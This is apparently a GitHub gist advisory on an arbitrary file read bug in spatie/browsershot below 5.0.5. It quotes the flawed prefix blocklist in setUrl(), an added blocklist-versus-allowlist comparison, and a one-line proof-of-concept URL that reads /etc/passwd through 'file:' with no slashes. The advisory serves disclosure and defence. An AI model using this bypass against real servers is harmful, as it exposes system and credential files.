@mrdgef

mrdgef/README.md

Last active December 31, 2024 14:03
spatie/browsershot < 5.0.5 : Improper Input Validation in Browsershot::url()

Description

The setUrl() function used by Browsershot::url() attempts to validate user input by blocking file URI schemes with a fixed list of string prefixes. An attacker can bypass this validation by omitting the slashes in file://<filename> (i.e. passing file:<filename>, which matches none of the listed prefixes), leading to arbitrary file read.

The affected function:

    public function setUrl(string $url): static
    {
        $url = trim($url);

        // Blocklist of literal prefixes. The check below is a plain
        // string-prefix match, so any spelling of a file URL that is not
        // listed here (such as "file:" with no slash) is not rejected.
        $unsupportedProtocols = [
            'file://',
            'file:/',
            'file:\\',
            'file:\\\\',
            'view-source',
        ];

        foreach ($unsupportedProtocols as $unsupportedProtocol) {
            if (str_starts_with(strtolower($url), $unsupportedProtocol)) {
                throw FileUrlNotAllowed::make();
            }
        }

        // Remainder of the setter (assumed; cut off in the gist): store and return.
        $this->url = $url;

        return $this;
    }
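To make the root cause concrete, here is an added example (not Browsershot's own code and not the upstream fix): the prefix blocklist from setUrl() reproduced as blocklistAllows(), beside an allowlist check allowlistAllows() that parses the scheme with parse_url() and only accepts http/https. The function names, the allowlist approach and the sample inputs are assumptions made for this illustration.

```php
<?php
// Added example, not part of the spatie/browsershot code base.

// Reproduces the blocklist logic of the affected setUrl(): a string-prefix
// match against a fixed list of spellings. 'file:etc/passwd' (the PoC value)
// starts with none of them, so it is allowed through.
function blocklistAllows(string $url): bool
{
    $url = strtolower(trim($url));
    foreach (['file://', 'file:/', 'file:\\', 'file:\\\\', 'view-source'] as $bad) {
        if (str_starts_with($url, $bad)) {
            return false;
        }
    }
    return true;
}

// Hardened check (assumed alternative, not the upstream patch): parse the URL
// and accept only an explicit http or https scheme with a host. Every spelling
// of a file URL parses to scheme "file", so the slash count no longer matters;
// a bare hostname without a scheme is also refused rather than guessed at.
function allowlistAllows(string $url): bool
{
    $parts = parse_url(trim($url));
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true);
}

// Constructed sample inputs: the page's own PoC value, one of the listed
// prefixes, and an ordinary http URL.
$samples = [
    'http://localhost/browsershot/example.php',
    'file:etc/passwd',
    'file://localhost/example',
    'view-source:http://localhost/',
];

foreach ($samples as $sample) {
    printf(
        "%-42s blocklist=%-5s allowlist=%s\n",
        $sample,
        blocklistAllows($sample) ? 'allow' : 'deny',
        allowlistAllows($sample) ? 'allow' : 'deny'
    );
}
```

Running it shows the blocklist allowing only the PoC value while the allowlist denies every non-http input, which is the check a defender wants when the package is upgraded to 5.0.5 or wrapped behind additional validation.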

Proof of Concept (PoC)

http://localhost/browsershot/example.php?url=file:etc/passwd

Output:

Impact & Severity

CIA: The vulnerability leads to arbitrary file read on a system that utilizes Browsershot. Integrity and availability are not affected.

Scope: The vulnerability can affect resources (the web server's file system) beyond the security scope managed by the security authority of the vulnerable component (Browsershot package).

CVSS 3.1: High - 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
